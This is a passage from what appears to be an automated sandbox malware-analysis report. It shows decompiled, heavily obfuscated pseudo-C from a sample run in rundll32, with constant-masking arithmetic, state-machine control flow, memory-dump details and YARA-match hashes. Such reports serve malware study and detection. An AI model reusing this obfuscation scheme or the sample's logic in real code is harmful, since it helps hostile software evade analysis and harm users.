                                                                      									_t276 =  *0x2011084;
                                                                      									 *_t326 = _t276;
                                                                      									 *0x2011084 = _t326;
                                                                      									return _t276;
                                                                      								}
                                                                      								if(_t327 != 0x31f83ea5) {
                                                                      									goto L19;
                                                                      								}
                                                                      								E0200A8BF(_v68, _v20, _v24, _v96,  *((intOrPtr*)(_t326 + 8)));
                                                                      								_t331 =  &(_t331[3]);
                                                                      								goto L11;
                                                                      							}
                                                                      							_push(_t289);
                                                                      							_t318 = 0x50;
                                                                      							_t326 = E01FF54FB(_t318);
                                                                      							__eflags = _t326;
                                                                      							if(__eflags == 0) {
                                                                      								_t327 = 0xddc842e;
                                                                      								_t289 = 0x23245655;
                                                                      								goto L19;
                                                                      							}
                                                                      							_t327 = 0x20f8708a;
                                                                      							goto L1;
                                                                      							L19:
                                                                      							__eflags = _t327 - 0xddc842e;
                                                                      						} while (__eflags != 0);
                                                                      						return _t271;
                                                                      					}
                                                                      				}
                                                                      			}
                                                                      0x00000000
                                                                      0x0200bf31
                                                                      0x0200bf2c
                                                                      0x0200c00e
                                                                      0x0200c013
                                                                      0x0200c01e
                                                                      0x0200c023
                                                                      0x0200c026
                                                                      0x0200bf2c
                                                                      0x0200bf2c
                                                                      0x00000000
                                                                      0x0200bf2c
                                                                      0x0200bf2c
                                                                      0x0200bf64
                                                                      0x0200bf9c
                                                                      0x0200bfa4
                                                                      0x0200bfa8
                                                                      0x0200bfa9
                                                                      0x0200bfaf
                                                                      0x0200bfb7
                                                                      0x0200bfbc
                                                                      0x0200bfbf
                                                                      0x0200bfc2
                                                                      0x0200bfc9
                                                                      0x0200bfce
                                                                      0x00000000
                                                                      0x0200bfce
                                                                      0x0200bf68
                                                                      0x0200c09e
                                                                      0x0200c0a1
                                                                      0x0200c0a6
                                                                      0x0200c0a8
                                                                      0x00000000
                                                                      0x0200c0a8
                                                                      0x0200bf74
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200bf8d
                                                                      0x0200bf92
                                                                      0x00000000
                                                                      0x0200bf92
                                                                      0x0200c067
                                                                      0x0200c06a
                                                                      0x0200c070
                                                                      0x0200c073
                                                                      0x0200c075
                                                                      0x0200c081
                                                                      0x0200c08b
                                                                      0x00000000
                                                                      0x0200c08b
                                                                      0x0200c077
                                                                      0x00000000
                                                                      0x0200c090
                                                                      0x0200c090
                                                                      0x0200c090
                                                                      0x00000000
                                                                      0x0200bf36
                                                                      0x0200bf31

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 'B$,6$K&$UV$#$UV$#$UV$#$Vh$Z'$Z}$]n$qy$n$f
                                                                      • API String ID: 0-847790408
                                                                      • Opcode ID: 55f47aaf987221093f4fb0127f49abcf2b7e03b2f84cc68f62626fe1e952e847
                                                                      • Instruction ID: 6992f7d42f0e381b1a0c56b39567eed6dd0a251190ca550061b5e9f8bc7aa692
                                                                      • Opcode Fuzzy Hash: 55f47aaf987221093f4fb0127f49abcf2b7e03b2f84cc68f62626fe1e952e847
                                                                      • Instruction Fuzzy Hash: 12C1327190C3419FE358CF25D88951BFBE2BBD4708F108A1DF59A9A2A0D7B6C945CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 'B$,6$K&$UV$#$UV$#$UV$#$Vh$Z'$Z}$]n$qy$n$f
                                                                      • API String ID: 0-847790408
                                                                      • Opcode ID: d18db09b0faadfb061b988d01f744b8e64b01c7cb996795b6b3781eb3c0fd8c2
                                                                      • Instruction ID: 6b9d34abf4da12f3357196af0005c683de571a5deba3acc0022536d622dd7201
                                                                      • Opcode Fuzzy Hash: d18db09b0faadfb061b988d01f744b8e64b01c7cb996795b6b3781eb3c0fd8c2
                                                                      • Instruction Fuzzy Hash: 76C1427190C3419FE358CF25C88A40BFBE2BBD4718F508A1DF5969A2A0D7B5C959CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E02003590() {
                                                                      				char _v520;
                                                                      				char _v1040;
                                                                      				char _v1560;
                                                                      				signed int _v1564;
                                                                      				intOrPtr _v1568;
                                                                      				intOrPtr _v1572;
                                                                      				intOrPtr _v1576;
                                                                      				char _v1580;
                                                                      				signed int _v1584;
                                                                      				signed int _v1588;
                                                                      				signed int _v1592;
                                                                      				signed int _v1596;
                                                                      				signed int _v1600;
                                                                      				signed int _v1604;
                                                                      				signed int _v1608;
                                                                      				signed int _v1612;
                                                                      				signed int _v1616;
                                                                      				signed int _v1620;
                                                                      				signed int _v1624;
                                                                      				signed int _v1628;
                                                                      				signed int _v1632;
                                                                      				signed int _v1636;
                                                                      				signed int _v1640;
                                                                      				signed int _v1644;
                                                                      				signed int _v1648;
                                                                      				signed int _v1652;
                                                                      				signed int _v1656;
                                                                      				signed int _v1660;
                                                                      				signed int _v1664;
                                                                      				signed int _v1668;
                                                                      				signed int _v1672;
                                                                      				signed int _v1676;
                                                                      				signed int _v1680;
                                                                      				signed int _v1684;
                                                                      				signed int _v1688;
                                                                      				signed int _v1692;
                                                                      				signed int _v1696;
                                                                      				signed int _v1700;
                                                                      				signed int _v1704;
                                                                      				signed int _v1708;
                                                                      				signed int _v1712;
                                                                      				signed int _v1716;
                                                                      				signed int _v1720;
                                                                      				signed int _v1724;
                                                                      				signed int _v1728;
                                                                      				signed int _v1732;
                                                                      				signed int _v1736;
                                                                      				signed int _v1740;
                                                                      				signed int _v1744;
                                                                      				signed int _v1748;
                                                                      				signed int _v1752;
                                                                      				signed int _v1756;
                                                                      				signed int _v1760;
                                                                      				signed int _v1764;
                                                                      				signed int _v1768;
                                                                      				signed int _v1772;
                                                                      				void* _t494;
                                                                      				signed int _t495;
                                                                      				signed int _t498;
                                                                      				void* _t507;
                                                                      				signed int _t518;
                                                                      				signed int _t520;
                                                                      				signed int _t521;
                                                                      				signed int _t522;
                                                                      				signed int _t523;
                                                                      				signed int _t524;
                                                                      				signed int _t525;
                                                                      				signed int _t526;
                                                                      				signed int _t527;
                                                                      				signed int _t528;
                                                                      				signed int _t529;
                                                                      				signed int _t530;
                                                                      				signed int _t531;
                                                                      				signed int _t532;
                                                                      				signed int _t533;
                                                                      				signed int _t534;
                                                                      				signed int _t535;
                                                                      				void* _t536;
                                                                      				void* _t538;
                                                                      				void* _t590;
                                                                      				signed int* _t595;
                                                                      
                                                                      				_t595 =  &_v1772;
                                                                      				_v1576 = 0xd2493;
                                                                      				_v1564 = 0;
                                                                      				_v1572 = 0x5ead38;
                                                                      				_v1568 = 0x4896fd;
                                                                      				_v1724 = 0xb66c;
                                                                      				_v1584 = 0;
                                                                      				_t590 = 0x184e3bc6;
                                                                      				_t521 = 0x45;
                                                                      				_v1724 = _v1724 / _t521;
                                                                      				_v1724 = _v1724 + 0x610;
                                                                      				_v1724 = _v1724 >> 3;
                                                                      				_v1724 = _v1724 ^ 0x0000013f;
                                                                      				_v1616 = 0x7825;
                                                                      				_t522 = 0x7d;
                                                                      				_v1616 = _v1616 / _t522;
                                                                      				_v1616 = _v1616 ^ 0x800000f7;
                                                                      				_v1648 = 0x6e2f;
                                                                      				_v1648 = _v1648 >> 0xb;
                                                                      				_v1648 = _v1648 ^ 0x0000000f;
                                                                      				_v1696 = 0x5cc1;
                                                                      				_v1696 = _v1696 << 5;
                                                                      				_v1696 = _v1696 | 0x9962b7ae;
                                                                      				_v1696 = _v1696 ^ 0x996b80cb;
                                                                      				_v1704 = 0xab0e;
                                                                      				_t523 = 0x26;
                                                                      				_v1704 = _v1704 / _t523;
                                                                      				_v1704 = _v1704 << 6;
                                                                      				_v1704 = _v1704 ^ 0x000171c2;
                                                                      				_v1732 = 0xff6;
                                                                      				_v1732 = _v1732 + 0xfe15;
                                                                      				_v1732 = _v1732 + 0x96bf;
                                                                      				_v1732 = _v1732 << 0xa;
                                                                      				_v1732 = _v1732 ^ 0x0693792e;
                                                                      				_v1708 = 0xab38;
                                                                      				_v1708 = _v1708 | 0x290ab240;
                                                                      				_v1708 = _v1708 ^ 0x3d842594;
                                                                      				_v1708 = _v1708 ^ 0x148ed7f1;
                                                                      				_v1740 = 0xabf1;
                                                                      				_v1740 = _v1740 + 0x6b39;
                                                                      				_t524 = 0x4d;
                                                                      				_v1740 = _v1740 * 0x17;
                                                                      				_v1740 = _v1740 / _t524;
                                                                      				_v1740 = _v1740 ^ 0x00001e9b;
                                                                      				_v1632 = 0xc8c7;
                                                                      				_v1632 = _v1632 | 0x1dddad59;
                                                                      				_v1632 = _v1632 ^ 0x1ddda3fd;
                                                                      				_v1728 = 0x1984;
                                                                      				_v1728 = _v1728 | 0xe50174fc;
                                                                      				_v1728 = _v1728 >> 9;
                                                                      				_v1728 = _v1728 + 0x6ab5;
                                                                      				_v1728 = _v1728 ^ 0x0072ca13;
                                                                      				_v1680 = 0xee20;
                                                                      				_v1680 = _v1680 + 0x6894;
                                                                      				_v1680 = _v1680 + 0xffff3cc6;
                                                                      				_v1680 = _v1680 ^ 0x0000b209;
                                                                      				_v1768 = 0xd586;
                                                                      				_v1768 = _v1768 * 0x1f;
                                                                      				_t525 = 0x5b;
                                                                      				_v1768 = _v1768 / _t525;
                                                                      				_v1768 = _v1768 >> 9;
                                                                      				_v1768 = _v1768 ^ 0x00007c3b;
                                                                      				_v1720 = 0x39b3;
                                                                      				_v1720 = _v1720 + 0xffff1073;
                                                                      				_v1720 = _v1720 ^ 0x7e8b47a9;
                                                                      				_v1720 = _v1720 ^ 0xe8576451;
                                                                      				_v1720 = _v1720 ^ 0x69231483;
                                                                      				_v1592 = 0x2734;
                                                                      				_t526 = 0x59;
                                                                      				_v1592 = _v1592 * 0x5a;
                                                                      				_v1592 = _v1592 ^ 0x000db9de;
                                                                      				_v1752 = 0xd37e;
                                                                      				_v1752 = _v1752 + 0xffff3b06;
                                                                      				_v1752 = _v1752 | 0x8ba20300;
                                                                      				_v1752 = _v1752 + 0xffff0a7e;
                                                                      				_v1752 = _v1752 ^ 0x8ba122a9;
                                                                      				_v1736 = 0xfdf5;
                                                                      				_v1736 = _v1736 ^ 0x4b0a6dd0;
                                                                      				_v1736 = _v1736 * 0x59;
                                                                      				_v1736 = _v1736 + 0xffff8d92;
                                                                      				_v1736 = _v1736 ^ 0x16abd156;
                                                                      				_v1700 = 0xf9fc;
                                                                      				_v1700 = _v1700 / _t526;
                                                                      				_t527 = 0x24;
                                                                      				_v1700 = _v1700 * 0x7a;
                                                                      				_v1700 = _v1700 ^ 0x000160f5;
                                                                      				_v1760 = 0x6097;
                                                                      				_v1760 = _v1760 + 0x9028;
                                                                      				_v1760 = _v1760 | 0x26d284d4;
                                                                      				_v1760 = _v1760 + 0xffff62d1;
                                                                      				_v1760 = _v1760 ^ 0x26d24200;
                                                                      				_v1668 = 0x58a3;
                                                                      				_v1668 = _v1668 / _t527;
                                                                      				_v1668 = _v1668 | 0xce2be8fd;
                                                                      				_v1668 = _v1668 ^ 0xce2b9730;
                                                                      				_v1588 = 0x5dca;
                                                                      				_v1588 = _v1588 | 0xcb121239;
                                                                      				_v1588 = _v1588 ^ 0xcb12429b;
                                                                      				_v1640 = 0xc4d;
                                                                      				_v1640 = _v1640 ^ 0x11c7ddf0;
                                                                      				_v1640 = _v1640 ^ 0x11c7841c;
                                                                      				_v1676 = 0x21f1;
                                                                      				_v1676 = _v1676 ^ 0x843604aa;
                                                                      				_v1676 = _v1676 ^ 0x2f7d7e62;
                                                                      				_v1676 = _v1676 ^ 0xab4b14fa;
                                                                      				_v1596 = 0xafc7;
                                                                      				_v1596 = _v1596 << 5;
                                                                      				_v1596 = _v1596 ^ 0x0015f7ef;
                                                                      				_v1692 = 0x8fa7;
                                                                      				_t528 = 0x5a;
                                                                      				_v1692 = _v1692 * 0x7c;
                                                                      				_v1692 = _v1692 + 0x4cbf;
                                                                      				_v1692 = _v1692 ^ 0x004598ea;
                                                                      				_v1744 = 0x9dac;
                                                                      				_v1744 = _v1744 | 0xb7a8ffb3;
                                                                      				_v1744 = _v1744 / _t528;
                                                                      				_v1744 = _v1744 ^ 0x020a4ecc;
                                                                      				_v1652 = 0x6ace;
                                                                      				_v1652 = _v1652 << 9;
                                                                      				_v1652 = _v1652 ^ 0x00d5de13;
                                                                      				_v1660 = 0xce58;
                                                                      				_t529 = 3;
                                                                      				_v1660 = _v1660 / _t529;
                                                                      				_v1660 = _v1660 ^ 0xb363bbfe;
                                                                      				_v1660 = _v1660 ^ 0xb36386d8;
                                                                      				_v1748 = 0x5863;
                                                                      				_v1748 = _v1748 | 0xab415f7d;
                                                                      				_t530 = 0x38;
                                                                      				_v1748 = _v1748 * 0x69;
                                                                      				_v1748 = _v1748 ^ 0x3fd727f3;
                                                                      				_v1748 = _v1748 ^ 0x020739d0;
                                                                      				_v1608 = 0xb7;
                                                                      				_v1608 = _v1608 + 0xffffc806;
                                                                      				_v1608 = _v1608 ^ 0xffffd476;
                                                                      				_v1600 = 0x1ae1;
                                                                      				_v1600 = _v1600 / _t530;
                                                                      				_v1600 = _v1600 ^ 0x00002061;
                                                                      				_v1756 = 0x997c;
                                                                      				_v1756 = _v1756 + 0xf405;
                                                                      				_v1756 = _v1756 >> 4;
                                                                      				_v1756 = _v1756 << 1;
                                                                      				_v1756 = _v1756 ^ 0x0000255b;
                                                                      				_v1764 = 0x43d1;
                                                                      				_v1764 = _v1764 + 0x2011;
                                                                      				_v1764 = _v1764 >> 6;
                                                                      				_v1764 = _v1764 + 0xffff3985;
                                                                      				_v1764 = _v1764 ^ 0xffff5831;
                                                                      				_v1772 = 0x27fc;
                                                                      				_v1772 = _v1772 << 4;
                                                                      				_v1772 = _v1772 + 0xffff71df;
                                                                      				_t531 = 0x70;
                                                                      				_v1772 = _v1772 / _t531;
                                                                      				_v1772 = _v1772 ^ 0x0000090e;
                                                                      				_v1604 = 0xd94c;
                                                                      				_t532 = 0x25;
                                                                      				_v1604 = _v1604 * 0x68;
                                                                      				_v1604 = _v1604 ^ 0x00581092;
                                                                      				_v1624 = 0x5ea0;
                                                                      				_v1624 = _v1624 * 0x74;
                                                                      				_v1624 = _v1624 ^ 0x002af6cb;
                                                                      				_v1636 = 0x3082;
                                                                      				_v1636 = _v1636 >> 6;
                                                                      				_v1636 = _v1636 ^ 0x00003692;
                                                                      				_v1644 = 0x999e;
                                                                      				_v1644 = _v1644 | 0x39006ece;
                                                                      				_v1644 = _v1644 ^ 0x3900e31d;
                                                                      				_v1684 = 0x1097;
                                                                      				_v1684 = _v1684 | 0x83c0eeba;
                                                                      				_v1684 = _v1684 / _t532;
                                                                      				_v1684 = _v1684 ^ 0x038f86d4;
                                                                      				_v1712 = 0xa774;
                                                                      				_v1712 = _v1712 + 0xffffc475;
                                                                      				_v1712 = _v1712 | 0x6e7db387;
                                                                      				_v1712 = _v1712 ^ 0x6e7dd3da;
                                                                      				_v1688 = 0xa5c3;
                                                                      				_v1688 = _v1688 ^ 0xe96270b2;
                                                                      				_v1688 = _v1688 * 0x25;
                                                                      				_v1688 = _v1688 ^ 0xbb48b417;
                                                                      				_v1612 = 0x2ed1;
                                                                      				_t533 = 0x2c;
                                                                      				_v1612 = _v1612 / _t533;
                                                                      				_v1612 = _v1612 ^ 0x00007f35;
                                                                      				_v1620 = 0x6bc9;
                                                                      				_v1620 = _v1620 | 0x4f77e0ce;
                                                                      				_v1620 = _v1620 ^ 0x4f778e3b;
                                                                      				_v1672 = 0x5319;
                                                                      				_v1672 = _v1672 | 0xbd54dbc0;
                                                                      				_t534 = 0x61;
                                                                      				_v1672 = _v1672 / _t534;
                                                                      				_v1672 = _v1672 ^ 0x01f3c105;
                                                                      				_v1628 = 0x8018;
                                                                      				_v1628 = _v1628 << 0xb;
                                                                      				_v1628 = _v1628 ^ 0x0400ec78;
                                                                      				_v1716 = 0x3982;
                                                                      				_v1716 = _v1716 | 0xa6eae1a8;
                                                                      				_v1716 = _v1716 + 0xa320;
                                                                      				_v1716 = _v1716 + 0xffffdd5b;
                                                                      				_v1716 = _v1716 ^ 0xa6eb35eb;
                                                                      				_v1656 = 0xdd8c;
                                                                      				_v1656 = _v1656 >> 7;
                                                                      				_v1656 = _v1656 + 0xffff2d32;
                                                                      				_v1656 = _v1656 ^ 0xffff529e;
                                                                      				_v1664 = 0xdc2e;
                                                                      				_v1664 = _v1664 ^ 0x013d526f;
                                                                      				_t535 = 0x14;
                                                                      				_t518 = _v1584;
                                                                      				_v1664 = _v1664 / _t535;
                                                                      				_v1664 = _v1664 ^ 0x000fe0b7;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t536 = 0x5c;
                                                                      					while(1) {
                                                                      						L2:
                                                                      						_t494 = 0x161f11dd;
                                                                      						do {
                                                                      							L3:
                                                                      							if(_t590 == _t494) {
                                                                      								_t495 = E0200232B(_v1712,  &_v1560, _v1688);
                                                                      								_pop(_t538);
                                                                      								_t498 = E01FF41AA(_v1580, _v1612, _v1664, _t538, _t518, _v1620, _v1672, _v1628,  &_v1560, 2 + _t495 * 2);
                                                                      								_t595 =  &(_t595[8]);
                                                                      								__eflags = _t498;
                                                                      								_t590 = 0x2ed72160;
                                                                      								_t451 = _t498 == 0;
                                                                      								__eflags = _t451;
                                                                      								_v1584 = 0 | _t451;
                                                                      								goto L19;
                                                                      							} else {
                                                                      								if(_t590 == 0x184e3bc6) {
                                                                      									_push(_t536);
                                                                      									E01FF471A(_v1724,  &_v520, _v1696, _v1704, _v1732, _v1708, _v1740);
                                                                      									_t595 =  &(_t595[8]);
                                                                      									_t590 = 0x26d2b2b4;
                                                                      									goto L1;
                                                                      								} else {
                                                                      									if(_t590 == 0x1977399b) {
                                                                      										_push(0x1ff1368);
                                                                      										_push(_v1652);
                                                                      										_push(_v1744);
                                                                      										_t542 = _v1596;
                                                                      										__eflags = E02000A84(E01FF5DFC(_v1596, _v1692, __eflags), _v1660, _v1648, _v1748, _v1608, _v1596, _v1600, _v1596,  &_v1580, _v1616, _t542, _t542, _v1756, _v1764, _v1772, _v1604, _t542, _v1624);
                                                                      										_t590 =  ==  ? 0x161f11dd : 0x12170868;
                                                                      										E02000D6D(_v1636, _v1644, _v1684, _t502);
                                                                      										_t595 =  &(_t595[0x15]);
                                                                      										L19:
                                                                      										_t494 = 0x161f11dd;
                                                                      										_t536 = 0x5c;
                                                                      										goto L20;
                                                                      									} else {
                                                                      										if(_t590 == 0x1bdb9a1c) {
                                                                      											_t520 =  *0x2011088 + 0x38;
                                                                      											while(1) {
                                                                      												__eflags =  *_t520 - _t536;
                                                                      												if(__eflags == 0) {
                                                                      													break;
                                                                      												}
                                                                      												_t520 = _t520 + 2;
                                                                      												__eflags = _t520;
                                                                      											}
                                                                      											_t518 = _t520 + 2;
                                                                      											_t590 = 0x1977399b;
                                                                      											goto L2;
                                                                      										} else {
                                                                      											if(_t590 == 0x26d2b2b4) {
                                                                      												_push(0x1ff1308);
                                                                      												_push(_v1768);
                                                                      												_push(_v1680);
                                                                      												_t507 = E01FF5DFC(_v1632, _v1728, __eflags);
                                                                      												E0200D4E1( &_v1040, __eflags);
                                                                      												E01FF98C5(0x104, __eflags, _v1720, _v1592, _v1752, _v1736, _v1700,  *0x2011088 + 0x254, _v1760, _v1668,  &_v1040,  *0x2011088 + 0x38, _t507,  &_v520);
                                                                      												E02000D6D(_v1588, _v1640, _v1676, _t507);
                                                                      												_t595 =  &(_t595[0x11]);
                                                                      												_t590 = 0x1bdb9a1c;
                                                                      												while(1) {
                                                                      													L1:
                                                                      													_t536 = 0x5c;
                                                                      													L2:
                                                                      													_t494 = 0x161f11dd;
                                                                      													goto L3;
                                                                      												}
                                                                      											} else {
                                                                      												if(_t590 != 0x2ed72160) {
                                                                      													goto L20;
                                                                      												} else {
                                                                      													E020070CF(_v1716, _v1656, _v1580);
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							L10:
                                                                      							return _v1584;
                                                                      							L20:
                                                                      							__eflags = _t590 - 0x12170868;
                                                                      						} while (__eflags != 0);
                                                                      						goto L10;
                                                                      					}
                                                                      				}
                                                                      			}




















































































                                                                      0x02003f27
                                                                      0x02003f2c
                                                                      0x02003f2c
                                                                      0x02003f2f
                                                                      0x00000000
                                                                      0x02003cc2
                                                                      0x02003cc8
                                                                      0x02003e97
                                                                      0x02003eb8
                                                                      0x02003ebd
                                                                      0x02003ec0
                                                                      0x00000000
                                                                      0x02003cce
                                                                      0x02003cd0
                                                                      0x02003deb
                                                                      0x02003df0
                                                                      0x02003df7
                                                                      0x02003dff
                                                                      0x02003e65
                                                                      0x02003e87
                                                                      0x02003e8a
                                                                      0x02003e8f
                                                                      0x02003f36
                                                                      0x02003f38
                                                                      0x02003f3d
                                                                      0x00000000
                                                                      0x02003cd6
                                                                      0x02003cdc
                                                                      0x02003dd4
                                                                      0x02003ddc
                                                                      0x02003ddc
                                                                      0x02003ddf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02003dd9
                                                                      0x02003dd9
                                                                      0x02003dd9
                                                                      0x02003de1
                                                                      0x02003de4
                                                                      0x00000000
                                                                      0x02003ce2
                                                                      0x02003ce8
                                                                      0x02003d20
                                                                      0x02003d25
                                                                      0x02003d29
                                                                      0x02003d38
                                                                      0x02003d46
                                                                      0x02003da1
                                                                      0x02003dbc
                                                                      0x02003dc1
                                                                      0x02003dc4
                                                                      0x02003cb2
                                                                      0x02003cb2
                                                                      0x02003cb4
                                                                      0x02003cb5
                                                                      0x02003cb5
                                                                      0x00000000
                                                                      0x02003cb5
                                                                      0x02003cea
                                                                      0x02003cf0
                                                                      0x00000000
                                                                      0x02003cf6
                                                                      0x02003d08
                                                                      0x02003d0d
                                                                      0x02003cf0
                                                                      0x02003ce8
                                                                      0x02003cdc
                                                                      0x02003cd0
                                                                      0x02003cc8
                                                                      0x02003d0e
                                                                      0x02003d1f
                                                                      0x02003f3e
                                                                      0x02003f3e
                                                                      0x02003f3e
                                                                      0x00000000
                                                                      0x02003f4a
                                                                      0x02003cb5

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $%x$/n$4'$9k$;|$QdW$[%$a $b~}/$cX$x
                                                                      • API String ID: 0-2114610450
                                                                      • Opcode ID: 29840740e1253ce522f88b8eed34185ee17de76963fa8b1e6f58fd57c191dda7
                                                                      • Instruction ID: b1989ce147089c46fc75b2bc2f4c3c78a1972168e953e2024096f704eb17f57d
                                                                      • Opcode Fuzzy Hash: 29840740e1253ce522f88b8eed34185ee17de76963fa8b1e6f58fd57c191dda7
                                                                      • Instruction Fuzzy Hash: 4232037150D380DFE368CF25D88AB9BBBE2BBC5304F10891DE199862A0D7B59949CF03
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E02007187(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                                                      				char _v64;
                                                                      				char _v128;
                                                                      				intOrPtr _v132;
                                                                      				intOrPtr _v136;
                                                                      				intOrPtr _v140;
                                                                      				intOrPtr _v144;
                                                                      				intOrPtr _v148;
                                                                      				intOrPtr* _v152;
                                                                      				char _v156;
                                                                      				signed int _v160;
                                                                      				signed int _v164;
                                                                      				signed int _v168;
                                                                      				signed int _v172;
                                                                      				signed int _v176;
                                                                      				signed int _v180;
                                                                      				signed int _v184;
                                                                      				signed int _v188;
                                                                      				signed int _v192;
                                                                      				signed int _v196;
                                                                      				signed int _v200;
                                                                      				signed int _v204;
                                                                      				signed int _v208;
                                                                      				signed int _v212;
                                                                      				signed int _v216;
                                                                      				signed int _v220;
                                                                      				signed int _v224;
                                                                      				signed int _v228;
                                                                      				signed int _v232;
                                                                      				signed int _v236;
                                                                      				signed int _v240;
                                                                      				signed int _v244;
                                                                      				signed int _v248;
                                                                      				signed int _v252;
                                                                      				signed int _v256;
                                                                      				signed int _v260;
                                                                      				signed int _v264;
                                                                      				signed int _v268;
                                                                      				signed int _v272;
                                                                      				signed int _v276;
                                                                      				signed int _v280;
                                                                      				signed int _v284;
                                                                      				signed int _v288;
                                                                      				signed int _v292;
                                                                      				signed int _v296;
                                                                      				signed int _v300;
                                                                      				signed int _v304;
                                                                      				signed int _v308;
                                                                      				signed int _v312;
                                                                      				signed int _v316;
                                                                      				signed int _v320;
                                                                      				signed int _t406;
                                                                      				signed int _t410;
                                                                      				void* _t417;
                                                                      				intOrPtr _t433;
                                                                      				intOrPtr* _t436;
                                                                      				signed int _t478;
                                                                      				signed int _t479;
                                                                      				signed int _t480;
                                                                      				signed int _t481;
                                                                      				signed int _t482;
                                                                      				signed int _t483;
                                                                      				signed int _t484;
                                                                      				intOrPtr _t485;
                                                                      				void* _t486;
                                                                      				intOrPtr* _t493;
                                                                      				signed int* _t494;
                                                                      				signed int* _t495;
                                                                      				signed int* _t496;
                                                                      
                                                                      				_t436 = __ecx;
                                                                      				_t494 =  &_v320;
                                                                      				_v144 = 0x3f72af;
                                                                      				_v136 = 0;
                                                                      				_v132 = 0;
                                                                      				_v140 = 0x419dab;
                                                                      				_v172 = 0xb463;
                                                                      				_v148 = __edx;
                                                                      				_t486 = 0x2fd49363;
                                                                      				_v152 = __ecx;
                                                                      				_t478 = 0x59;
                                                                      				_v172 = _v172 / _t478;
                                                                      				_v172 = _v172 ^ 0x00001d3c;
                                                                      				_v212 = 0x8309;
                                                                      				_v212 = _v212 | 0x8582e029;
                                                                      				_v212 = _v212 ^ 0x8582ffb6;
                                                                      				_v196 = 0x538d;
                                                                      				_v196 = _v196 | 0x45df7b90;
                                                                      				_v196 = _v196 ^ 0x45df0507;
                                                                      				_v220 = 0x862c;
                                                                      				_v220 = _v220 + 0xb39a;
                                                                      				_v220 = _v220 ^ 0x00010d91;
                                                                      				_v232 = 0x9f44;
                                                                      				_v232 = _v232 ^ 0x181d052d;
                                                                      				_t479 = 0x60;
                                                                      				_v232 = _v232 / _t479;
                                                                      				_v232 = _v232 ^ 0x00407958;
                                                                      				_v164 = 0x87c0;
                                                                      				_v164 = _v164 << 3;
                                                                      				_v164 = _v164 ^ 0x000420a8;
                                                                      				_v252 = 0x893b;
                                                                      				_v252 = _v252 + 0xffff57e5;
                                                                      				_v252 = _v252 + 0xffff4235;
                                                                      				_v252 = _v252 ^ 0xffff2531;
                                                                      				_v228 = 0xe4b4;
                                                                      				_v228 = _v228 ^ 0x8f8823fd;
                                                                      				_v228 = _v228 + 0xffffac51;
                                                                      				_v228 = _v228 ^ 0x8f8836c7;
                                                                      				_v292 = 0x30ec;
                                                                      				_v292 = _v292 + 0xffff5b52;
                                                                      				_v292 = _v292 + 0x6c9c;
                                                                      				_v292 = _v292 << 0xa;
                                                                      				_v292 = _v292 ^ 0xffe355d2;
                                                                      				_v260 = 0x7acb;
                                                                      				_v260 = _v260 + 0xffffa0ea;
                                                                      				_v260 = _v260 | 0x99ee16c0;
                                                                      				_v260 = _v260 ^ 0x99ee2715;
                                                                      				_v236 = 0x660;
                                                                      				_v236 = _v236 >> 3;
                                                                      				_v236 = _v236 ^ 0xfad9dcdf;
                                                                      				_v236 = _v236 ^ 0xfad9c9f6;
                                                                      				_v188 = 0x2ec9;
                                                                      				_v188 = _v188 * 0x1e;
                                                                      				_v188 = _v188 ^ 0x00056cd6;
                                                                      				_v176 = 0xdb2b;
                                                                      				_v176 = _v176 + 0x1ae1;
                                                                      				_v176 = _v176 ^ 0x0000f432;
                                                                      				_v308 = 0x4019;
                                                                      				_v308 = _v308 | 0x5723cddb;
                                                                      				_v308 = _v308 << 6;
                                                                      				_v308 = _v308 + 0xffff2d56;
                                                                      				_v308 = _v308 ^ 0xc8f2fe5d;
                                                                      				_v168 = 0x4395;
                                                                      				_v168 = _v168 ^ 0x67ca4501;
                                                                      				_v168 = _v168 ^ 0x67ca76df;
                                                                      				_v264 = 0x84c6;
                                                                      				_v264 = _v264 | 0x00adff5b;
                                                                      				_v264 = _v264 + 0x6303;
                                                                      				_v264 = _v264 ^ 0x00ae478b;
                                                                      				_v244 = 0x4752;
                                                                      				_v244 = _v244 + 0x93ca;
                                                                      				_v244 = _v244 >> 9;
                                                                      				_v244 = _v244 ^ 0x00006083;
                                                                      				_v160 = 0x645a;
                                                                      				_v160 = _v160 << 6;
                                                                      				_v160 = _v160 ^ 0x00191e2a;
                                                                      				_v276 = 0x9751;
                                                                      				_v276 = _v276 << 8;
                                                                      				_v276 = _v276 + 0xffff5caf;
                                                                      				_t480 = 0xa;
                                                                      				_v276 = _v276 / _t480;
                                                                      				_v276 = _v276 ^ 0x000f67c9;
